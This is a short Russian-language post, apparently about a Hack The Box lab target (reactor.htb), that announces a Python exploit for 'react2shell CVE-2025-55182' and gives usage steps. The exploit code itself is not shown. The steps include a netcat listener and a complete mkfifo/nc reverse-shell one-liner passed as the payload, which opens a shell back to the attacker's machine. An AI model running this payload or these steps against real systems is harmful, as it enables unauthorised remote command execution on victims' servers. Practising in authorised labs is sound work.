
Я создал простой react2shell CVE-2025-55182 Python эксплойт
Я создал простой эксплойт на Python для react2shell CVE-2025-55182 ИСПОЛЬЗОВАНИЕ
Сохраните скрипт: сохраните код выше как exploit.py.
Обновите файл Hosts: убедитесь, что reactor.htb разрешается в IP-адрес цели в вашем файле /etc/hosts. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts
Запустите слушатель: откройте терминал для приема обратной оболочки. nc -lvnp 4444
Запустите эксплойт: выполните скрипт с полезной нагрузкой обратной оболочки. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"
Замените <YOUR_IP> на ваш IP-адрес tun0.